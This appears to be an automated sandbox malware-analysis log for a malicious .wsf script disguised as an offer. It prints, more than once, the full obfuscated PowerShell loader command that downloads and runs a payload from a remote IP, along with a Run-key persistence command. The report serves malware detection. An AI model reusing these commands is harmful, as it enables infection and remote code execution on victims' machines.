              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_046BFB205_2_046BFB20
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_046BEF085_2_046BEF08
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_049093505_2_04909350
              Source: rOferta_SKGNMECLemnedefinitionen353523577.wsfInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"
              Source: amsi32_1492.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6256, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1492, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winWSF@17/9@2/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Sneglefart.GloJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\jnbcourg-8XH6PE
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zoco44qv.bpu.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6256
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1492
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: rOferta_SKGNMECLemnedefinitionen353523577.wsfVirustotal: Detection: 11%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\rOferta_SKGNMECLemnedefinitionen353523577.wsf"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'FJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
